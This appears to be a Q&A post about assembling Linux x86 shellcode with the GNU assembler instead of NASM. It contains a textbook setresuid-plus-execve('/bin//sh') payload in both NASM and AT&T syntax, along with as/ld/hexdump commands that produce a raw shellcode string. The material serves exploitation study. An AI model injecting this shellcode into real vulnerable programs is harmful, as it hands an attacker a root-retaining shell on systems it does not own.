# Using GNU assembler for shellcode

Tags: assembly, x86, att, gnu-assembler, shellcode

Is it possible to use the GNU assembler for shellcode without too much headache? I prefer the AT&T syntax to Intel syntax. I'm working through Hacking the Art of Exploitation, so they wrote their shellcode to assemble with NASM.

However, the problem is that when using the GNU assembler, I get massive binaries of around 480 bytes in size compared to NASM's output of about 35 bytes in size. Alarmingly, many of these bytes appear to be `0000`, or null bytes! Also, it seems to not be possible to assemble programs without an `_start` label- but this defines a procedure that would not really work well as a shellcode exploit.

Here is Hacking the Art of Exploitation's code:

```
BITS 32
xor eax, eax
xor ebx, ebx
xor ecx, ecx
cdq
mov BYTE al, 0xa4
int 0x80
push BYTE 11
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 0x80
```

My translation:

```
.code32
.section .text
    .globl _start
_start:
    xorl %eax, %eax
    xorl %ebx, %ebx
    xorl %ecx, %ecx
    cltd
    movb $0xa4, %al
    int $0x80
    push $11
    popl %eax
    pushl %ecx
    pushl $0x68732f2f
    pushl $0x6e69622f
    movl %esp, %ebx
    pushl %ecx
    movl %esp, %edx
    pushl %ebx
    movl %esp, %ecx
    int $0x80
```

Comment: Use something like `as --32 shellcode.s -o shellcode.o` to assemble the code to an object file. Then link it to an executable outputting it as binary with `ld -melf_i386 --oformat=binary shellcode.o -o shellcode` , The reason your file is larger is because you likely output an ELF executable which includes ELF header info. You could then create a shell string with `hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode`

Comment: Thanks man. Running diff on the two files (the author's assembled NASM shellcode and my assembled GNU shellcode) shows that they do not differ at all.